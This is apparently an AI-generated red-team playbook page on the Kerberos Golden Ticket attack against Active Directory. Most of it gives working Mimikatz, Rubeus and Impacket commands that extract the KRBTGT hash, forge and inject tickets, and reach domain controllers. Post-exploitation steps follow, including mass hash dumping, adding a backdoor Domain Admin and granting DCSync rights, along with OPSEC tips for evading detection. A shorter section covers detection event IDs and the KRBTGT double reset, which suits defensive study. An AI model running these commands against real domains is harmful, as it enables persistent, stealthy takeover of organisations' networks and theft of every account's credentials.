attack-11-golden-ticket-attack.md (21675B)
1 --- 2 title: "Attack #11 β Golden Ticket Attack" 3 description: "The Golden Ticket attack is the most powerful persistence technique in Active Directory. It exploits the fundamental trust model of the Kerberos protocolβ¦" 4 category: active-directory 5 subcategory: "Kerberos & Delegation" 6 tags: ["active-directory", "kerberos", "credential-access", "privilege-escalation", "persistence"] 7 tools: ["NetExec", "Impacket", "Mimikatz", "Rubeus", "Evil-WinRM"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Two/π Attack #11 β Golden Ticket Attack.md" 11 --- 12 # π Attack #11 β Golden Ticket Attack 13 14 *** 15 16 ## π How It Works 17 18 The Golden Ticket attack is **the most powerful persistence technique in Active Directory**. It exploits the fundamental trust model of the Kerberos protocol β every TGT in the entire domain is signed and encrypted using the **KRBTGT account's hash**, and the Domain Controller trusts any TGT bearing a valid KRBTGT signature without further verification. If an attacker obtains the KRBTGT hash, they can **forge entirely fake TGTs for any user, with any group memberships, any privileges, and any ticket lifetime** β completely offline, without ever contacting the DC again. 19 20 The resulting forged ticket is cryptographically indistinguishable from a legitimate one because it is signed with the real KRBTGT key. The attacker can impersonate the Domain Administrator, add themselves to any group (including non-existent ones), set ticket lifetimes of 10 years, and authenticate to any service in the domain β including after the legitimate admin's password is changed, after the attacker's account is deleted, and even after the attacker's physical access is revoked. The **only way to invalidate a Golden Ticket** is to reset the KRBTGT password **twice** β once is insufficient because both the current and previous hash are accepted. 21 22 ### What You Need to Forge a Golden Ticket 23 24 | Parameter | Where to Get It | Notes | 25 |---|---|---| 26 | **KRBTGT NT hash** | DCSync, NTDS.dit dump, LSASS on DC | The master key β the entire attack depends on this | 27 | **KRBTGT AES256 key** | Mimikatz `sekurlsa::ekeys` on DC | Preferred β stealthier than RC4 | 28 | **Domain SID** | `whoami /user`, PowerView, `Get-ADDomain` | e.g. `S-1-5-21-...` β everything before the last `-` | 29 | **Domain FQDN** | `$env:USERDNSDOMAIN`, `ipconfig /all` | e.g. `corp.local` | 30 | **Target username** | Any valid or forged username | Post-Nov 2021 patches require real username | 31 32 ### The Full Attack Flow 33 34 ``` 35 1. Compromise any path to Domain Admin (spraying β lateral movement β priv esc) 36 2. Extract KRBTGT hash via DCSync or NTDS.dit dump 37 3. Collect domain SID 38 4. Forge a Golden Ticket offline (no DC contact needed) 39 5. Inject into current session (kerberos::ptt / Rubeus ptt) 40 6. Access any domain resource as the forged user β permanently 41 7. Even if your account is deleted / password changed β ticket still works 42 8. Persist indefinitely until KRBTGT password is reset TWICE 43 ``` 44 45 *** 46 47 ## βοΈ Prerequisites 48 49 | Requirement | Detail | 50 |---|---| 51 | **Domain Admin or DC access** | Required to extract the KRBTGT hash β this is a post-DA persistence technique | 52 | **KRBTGT NT hash or AES key** | Obtained via DCSync, NTDS.dit dump, or Mimikatz on DC | 53 | **Domain SID** | Available from any domain-joined host with low-priv access | 54 | **Valid domain username** | Post-Nov 2021 Windows updates require the forged username to exist in AD | 55 56 *** 57 58 ## π οΈ Tools 59 60 | Tool | Platform | Notes | 61 |---|---|---| 62 | **Mimikatz** | Windows | `kerberos::golden` β original Golden Ticket forge command | 63 | **Rubeus** | Windows | `golden` subcommand β cleaner, supports AES, `/ptt` injection | 64 | **Impacket β ticketer.py** | Linux | Linux-based Golden Ticket forging; outputs `.ccache` file | 65 | **Impacket β secretsdump.py** | Linux | Extract KRBTGT hash via DCSync before forging | 66 | **CrackMapExec / NetExec** | Linux | `--use-kcache` to authenticate with the forged ticket | 67 | **Evil-WinRM** | Linux | Accepts `KRB5CCNAME` for Golden Ticket-based shell | 68 69 *** 70 71 ## π» Full Commands 72 73 ### π΅ Step 0 β Extract KRBTGT Hash (DCSync Method β Most Common) 74 75 ```powershell 76 # ββ Mimikatz DCSync β pull KRBTGT hash from any domain-joined machine ββββββββββ 77 # (Requires DA or account with Replication rights) 78 privilege::debug 79 lsadump::dcsync /domain:corp.local /user:krbtgt 80 81 # Output will contain: 82 # Hash NTLM: 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d β NT hash (RC4) 83 # aes256_hmac: b65fb27c8e0d7c5f48b16c10b4... β AES256 key (preferred) 84 # aes128_hmac: a1b2c3d4e5f6a7b8c9d0e1f2... β AES128 key 85 86 # ββ Also pull domain SID while you're at it βββββββββββββββββββββββββββββββββββ 87 lsadump::dcsync /domain:corp.local /user:Administrator 88 # Domain SID is embedded in the output: S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX 89 ``` 90 91 ```bash 92 # ββ Linux β DCSync via Impacket ββββββββββββββββββββββββββββββββββββββββββββββββ 93 secretsdump.py corp.local/Administrator:'Password1'@DC01.corp.local -just-dc-user krbtgt 94 95 # Using NT hash (PtH) 96 secretsdump.py corp.local/Administrator@DC01.corp.local \ 97 -hashes :8846f7eaee8fb117ad06bdd830b7586c -just-dc-user krbtgt 98 99 # Extract NTLM hash β it's the right side of: 100 # corp.local\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d::: 101 # ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 102 # This is your KRBTGT NT hash 103 ``` 104 105 *** 106 107 ### π΅ Step 0b β Get Domain SID 108 109 ```powershell 110 # Windows β multiple methods 111 whoami /user # SID of current user β remove last -RID 112 Get-ADDomain | Select-Object DomainSID 113 (Get-ADUser -Identity Administrator).SID # Remove last segment (-500) 114 115 # PowerView 116 Get-DomainSID 117 118 # Example SID: S-1-5-21-3878595448-1012506728-1948843120 119 # Domain SID = S-1-5-21-3878595448-1012506728-1948843120 120 # (just drop the trailing -RID, e.g. -500 for Administrator) 121 ``` 122 123 ```bash 124 # Linux β via lookupsid.py 125 lookupsid.py corp.local/low_user:'Password1'@DC01.corp.local 0 126 # Output: [*] Domain SID is: S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX 127 ``` 128 129 *** 130 131 ### π΄ Mimikatz β Forge & Inject Golden Ticket (Windows) 132 133 ```powershell 134 # ββ Standard Golden Ticket β impersonate Administrator ββββββββββββββββββββββββ 135 kerberos::golden \ 136 /user:Administrator \ 137 /domain:corp.local \ 138 /sid:S-1-5-21-3878595448-1012506728-1948843120 \ 139 /krbtgt:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \ 140 /ptt 141 142 # ββ Flags explained: 143 # /user = username to impersonate (must exist post-Nov 2021 patches) 144 # /domain = target domain FQDN 145 # /sid = domain SID (not user SID β no trailing RID) 146 # /krbtgt = KRBTGT NT hash (RC4) 147 # /ptt = inject directly into current session (pass-the-ticket) 148 149 # ββ Golden Ticket with AES256 (stealthiest β no RC4 downgrade in logs) ββββββββ 150 kerberos::golden \ 151 /user:Administrator \ 152 /domain:corp.local \ 153 /sid:S-1-5-21-3878595448-1012506728-1948843120 \ 154 /aes256:b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 155 /ptt 156 157 # ββ Save to .kirbi file (for later use / transfer to another machine) βββββββββ 158 kerberos::golden \ 159 /user:Administrator \ 160 /domain:corp.local \ 161 /sid:S-1-5-21-3878595448-1012506728-1948843120 \ 162 /krbtgt:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \ 163 /ticket:golden_admin.kirbi 164 165 # Inject saved .kirbi later 166 kerberos::ptt golden_admin.kirbi 167 168 # ββ Forge ticket with extended lifetime (10 years) βββββββββββββββββββββββββββ 169 kerberos::golden \ 170 /user:Administrator \ 171 /domain:corp.local \ 172 /sid:S-1-5-21-3878595448-1012506728-1948843120 \ 173 /krbtgt:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \ 174 /startoffset:0 /endin:600 /renewmax:10080 \ 175 /ptt 176 177 # ββ Forge ticket for a fake/non-existent user (older DCs without Nov 2021 patch) 178 kerberos::golden \ 179 /user:hax0r_da \ 180 /domain:corp.local \ 181 /sid:S-1-5-21-3878595448-1012506728-1948843120 \ 182 /krbtgt:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \ 183 /groups:512,513,518,519,520 \ 184 /ptt 185 # /groups = RID list to embed (512=DA, 513=DU, 518=Schema, 519=EA, 520=GPO) 186 187 # ββ Verify injection ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 188 klist 189 # Should show ticket for Administrator@CORP.LOCAL with long lifetime 190 191 # ββ Use the Golden Ticket βββββββββββββββββββββββββββββββββββββββββββββββββββββ 192 dir \\DC01.corp.local\C$ 193 psexec.exe \\DC01.corp.local cmd.exe 194 ``` 195 196 *** 197 198 ### π΄ Rubeus β Forge Golden Ticket (Windows β Modern Approach) 199 200 ```powershell 201 # ββ Golden Ticket with RC4 (NT hash) βββββββββββββββββββββββββββββββββββββββββ 202 .\Rubeus.exe golden \ 203 /user:Administrator \ 204 /domain:corp.local \ 205 /sid:S-1-5-21-3878595448-1012506728-1948843120 \ 206 /rc4:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \ 207 /ptt /nowrap 208 209 # ββ Golden Ticket with AES256 (preferred β blends with normal Kerberos traffic) β 210 .\Rubeus.exe golden \ 211 /user:Administrator \ 212 /domain:corp.local \ 213 /sid:S-1-5-21-3878595448-1012506728-1948843120 \ 214 /aes256:b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 215 /ptt /nowrap 216 217 # ββ Inject and save simultaneously βββββββββββββββββββββββββββββββββββββββββββ 218 .\Rubeus.exe golden \ 219 /user:Administrator \ 220 /domain:corp.local \ 221 /sid:S-1-5-21-3878595448-1012506728-1948843120 \ 222 /rc4:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \ 223 /ptt /outfile:golden_admin.kirbi /nowrap 224 225 # ββ Verify ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 226 .\Rubeus.exe triage 227 klist 228 ``` 229 230 *** 231 232 ### π΄ Impacket β ticketer.py (Linux β Forge Golden Ticket) 233 234 ```bash 235 # ββ Forge Golden Ticket from Linux using NT hash ββββββββββββββββββββββββββββββ 236 ticketer.py -nthash 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \ 237 -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \ 238 -domain corp.local \ 239 Administrator 240 # Output: Administrator.ccache 241 242 # ββ Forge using AES256 key (stealthier) βββββββββββββββββββββββββββββββββββββββ 243 ticketer.py -aesKey b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 244 -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \ 245 -domain corp.local \ 246 Administrator 247 248 # ββ Forge with specific extra groups (embed DA + EA group memberships) ββββββββ 249 ticketer.py -nthash 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \ 250 -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \ 251 -domain corp.local \ 252 -extra-sid S-1-5-21-3878595448-1012506728-1948843120-519 \ 253 Administrator 254 255 # ββ Set and use the ticket ββββββββββββββββββββββββββββββββββββββββββββββββββββ 256 export KRB5CCNAME=Administrator.ccache 257 258 # Verify ticket 259 klist 260 261 # Access DC as forged DA 262 psexec.py -k -no-pass corp.local/Administrator@DC01.corp.local 263 wmiexec.py -k -no-pass corp.local/Administrator@DC01.corp.local 264 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local 265 266 # NetExec 267 nxc smb DC01.corp.local --use-kcache 268 nxc smb DC01.corp.local --use-kcache -x "whoami /all" 269 270 # Evil-WinRM 271 evil-winrm -i DC01.corp.local -r corp.local 272 ``` 273 274 *** 275 276 ### π΄ Cross-Domain Golden Ticket (Enterprise Admin Access) 277 278 ```bash 279 # ββ Include Extra SID for Enterprise Admins (cross-domain forest access) ββββββ 280 # Extra SID format: <RootDomainSID>-519 (Enterprise Admins RID = 519) 281 ticketer.py -nthash 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \ 282 -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \ 283 -domain corp.local \ 284 -extra-sid S-1-5-21-ROOT-DOMAIN-SID-519 \ 285 Administrator 286 287 # ββ Mimikatz version ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 288 kerberos::golden \ 289 /user:Administrator \ 290 /domain:corp.local \ 291 /sid:S-1-5-21-3878595448-1012506728-1948843120 \ 292 /krbtgt:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \ 293 /sids:S-1-5-21-ROOT-DOMAIN-SID-519 \ 294 /ptt 295 # /sids = extra SIDs to embed (Enterprise Admins in root domain) 296 ``` 297 298 *** 299 300 ### π΄ Post-Golden Ticket β Immediate Actions 301 302 ```bash 303 # ββ 1. Dump ALL domain hashes (DCSync with forged DA ticket) ββββββββββββββββββ 304 export KRB5CCNAME=Administrator.ccache 305 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local \ 306 -just-dc-ntlm -outputfile all_domain_hashes 307 308 # ββ 2. Create a persistent backdoor domain admin account βββββββββββββββββββββ 309 nxc smb DC01.corp.local --use-kcache \ 310 -x "net user backdoor P@ssword123! /add /domain && net group 'Domain Admins' backdoor /add /domain" 311 312 # ββ 3. Give own account DCSync rights (ACL persistence β Attack #65) βββββββββ 313 # Add Replication-Get-Changes-All to low_user via PowerView 314 Import-Module .\PowerView.ps1 315 Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" \ 316 -PrincipalIdentity low_user \ 317 -Rights DCSync -Verbose 318 319 # ββ 4. Add KRBTGT hash to your notes β it's your persistent master key ββββββββ 320 # Even if DA password changes, KRBTGT hash = permanent domain access 321 # Until KRBTGT password reset TWICE 322 ``` 323 324 *** 325 326 ## π― OPSEC Tips 327 328 - **Use AES256 over RC4** β RC4-encrypted Golden Tickets generate `EncryptionType: 0x17` in Event 4769, which stands out in AES-enforced environments; AES256 is `EncryptionType: 0x12` and is completely normal 329 - **Set realistic ticket lifetimes** β a 10-year TGT lifetime is a dead giveaway; set `endin` to 600 minutes (default 10 hours) to blend in 330 - **Use a real existing username** β post-November 2021 patches validate that the username exists in AD; forged tickets with fake usernames will fail on patched DCs 331 - **Keep the KRBTGT hash stored securely** β it is your permanent backdoor key; treat it with the same security as a private key 332 - **Don't inject Golden Tickets on the DC itself** β authentication events from LSASS on a DC are heavily monitored; inject on a workstation and access remotely 333 - **Request individual TGS tickets** rather than accessing resources broadly β targeted service access is harder to correlate than sweeping domain access 334 335 *** 336 337 ## π‘οΈ Detection β Event IDs 338 339 | Event ID | Source | What to Look For | 340 |---|---|---| 341 | **4769** | Security Log | TGS requested but **no prior 4768** (TGT request) β forged tickets skip the AS-REQ | 342 | **4769** | Security Log | `EncryptionType: 0x17` (RC4) on a domain enforcing AES | 343 | **4769** | Security Log | TGS for **non-existent user** (pre-Nov 2021 DCs) β `0x6` error code | 344 | **4770** | Security Log | TGT renewal β abnormally long remaining lifetime on renewal | 345 | **4624** | Security Log | Logon Type 3 with Kerberos from a machine the user has no business being on | 346 | **4672** | Security Log | Special privileges assigned β DA-level access from unexpected host | 347 | **4728/4732** | Security Log | User added to privileged group shortly before suspicious logon | 348 349 **Primary detection signature:** A valid TGS request (4769) with **no corresponding TGT request (4768) from the same IP** is the definitive Golden Ticket indicator β forged TGTs are never presented to the DC as part of an AS-REQ exchange because they were forged offline. Microsoft Defender for Identity (MDI) specifically detects this "TGS without TGT" pattern and raises a high-confidence alert. 350 351 ### Invalidating Golden Tickets 352 353 ```powershell 354 # ββ Reset KRBTGT password TWICE (required to invalidate all forged tickets) ββββ 355 # First reset β invalidates tickets signed with current hash 356 Set-ADAccountPassword -Identity krbtgt -NewPassword (ConvertTo-SecureString \ 357 "NewKrbtgtPassword1!" -AsPlainText -Force) 358 359 # Wait 10 hours for replication + ticket expiry, then: 360 # Second reset β invalidates tickets signed with previous hash 361 Set-ADAccountPassword -Identity krbtgt -NewPassword (ConvertTo-SecureString \ 362 "NewKrbtgtPassword2!" -AsPlainText -Force) 363 364 # β οΈ WARNING: Both resets must propagate to ALL DCs before the attacker's 365 # ticket expires β otherwise the attacker can immediately forge a new one 366 # from the compromised but not-yet-propagated new hash 367 ``` 368 369 *** 370 371 ## π Attack Chain Context 372 373 ``` 374 [Golden Ticket] βββ Permanent Domain Ownership 375 β 376 ββββ π Authenticate as any user to any service β indefinitely 377 ββββ π©Έ DCSync on demand β dump all hashes whenever needed 378 ββββ π Cross-forest access via Extra SID embedding (Attack #69) 379 ββββ π€ SID History injection β embed historical SIDs for legacy access 380 ββββ π Survives: password changes, account deletions, DA removals 381 ββββ π Only defeated by: KRBTGT password reset Γ 2 382 ``` 383 384 **The persistence chain in practice:** An attacker who achieves Domain Admin, runs DCSync to get the KRBTGT hash, and generates a Golden Ticket has **effectively won permanently**. Even if the blue team detects the initial compromise, changes every account password, and removes the attacker's access β the KRBTGT hash doesn't change unless explicitly reset. Most organisations never reset the KRBTGT password during incident response because they don't know it's required, leaving the attacker with indefinite re-entry. 385 386 *** 387 388 > β **Attack #11 β Golden Ticket complete.** Tell me to move on when you're ready for **Attack #12 β Silver Ticket Attack**. 389 390 Sources 391 What a Golden Ticket Attack Is and How to Defend Against One https://www.legitsecurity.com/aspm-knowledge-base/golden-ticket-attack 392 What is a Golden Ticket Attack? - CrowdStrike https://www.crowdstrike.com/en-us/cybersecurity-101/cyberattacks/golden-ticket-attack/ 393 What Is a Golden Ticket Attack and How to Detect It https://www.huntress.com/cybersecurity-101/topic/what-is-golden-ticket-attack 394 What Is a Golden Ticket Attack? Definition & Prevention https://jumpcloud.com/it-index/what-is-a-golden-ticket-attack 395 Steal or Forge Kerberos Tickets: Golden Ticket https://attack.mitre.org/techniques/T1558/001/ 396 Understanding the golden ticket attack with Mimikatz https://netwrix.com/company/resources/blog/golden-ticket-attack-mimikatz-detection-defense/ 397 How to Defend Against Golden Ticket Attacks: AD Security 101 https://www.semperis.com/blog/how-to-defend-against-golden-ticket-attacks/ 398 Pass-the-ticket attacks: How to detect and prevent credential theft https://www.manageengine.com/products/eventlog/cyber-security/pass-the-ticket-attack.html 399 What Is a Golden Ticket Attack? How It Works, Detection and Prevention https://netwrix.com/en/cybersecurity-glossary/cyber-security-attacks/golden-ticket-attack/ 400 Kerberos Protocol: Security Attacks and Solution https://ieeexplore.ieee.org/document/10777133/ 401 Detecting Abuse of Domain Administrator Privilege Using Windows Event Log https://ieeexplore.ieee.org/document/8631459/ 402 Detecting Forged Kerberos Tickets in an Active Directory Environment https://arxiv.org/ftp/arxiv/papers/2301/2301.00044.pdf 403 RASP for LSASS: Preventing Mimikatz-Related Attacks https://arxiv.org/pdf/2401.00316.pdf 404 Ransomware: Analysing the Impact on Windows Active Directory Domain 405 Services https://arxiv.org/pdf/2202.03276.pdf 406 HADES: Detecting Active Directory Attacks via Whole Network Provenance 407 Analytics http://arxiv.org/pdf/2407.18858.pdf 408 Catch Me if You Can: Effective Honeypot Placement in Dynamic AD Attack 409 Graphs https://arxiv.org/pdf/2312.16820.pdf 410 Ransomware: Analysing the Impact on Windows Active Directory Domain Services https://www.mdpi.com/1424-8220/22/3/953/pdf 411 The Reversing Machine: Reconstructing Memory Assumptions https://arxiv.org/pdf/2405.00298.pdf 412 Can LLMs Hack Enterprise Networks? Autonomous Assumed Breach 413 Penetration-Testing Active Directory Networks https://arxiv.org/pdf/2502.04227.pdf 414 Detecting and mitigating Active Directory compromises https://www.cyber.gov.au/business-government/detecting-responding-to-threats/detecting-and-mitigating-active-directory-compromises 415 Detection Mechanism https://www.manageengine.com/log-management/cyber-security/golden-ticket-attack.html 416 Detecting and Preventing the Path to a Golden Ticket With Cortex XDR https://www.paloaltonetworks.com/blog/security-operations/detecting-and-preventing-the-path-to-a-golden-ticket-with-cortex-xdr/ 417 What is a Golden Ticket Attack? - SentinelOne https://www.sentinelone.com/cybersecurity-101/cybersecurity/golden-ticket-attack/ 418 Breaking the Ticket: A Beginner's Guide to Kerberos Attacks https://owasp.org/www-chapter-bangkok/slides/2025/2025-02-07_Breaking-the-Ticket-A-Beginners-Guide-to-Kerberos-Attacks.pdf 419 T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md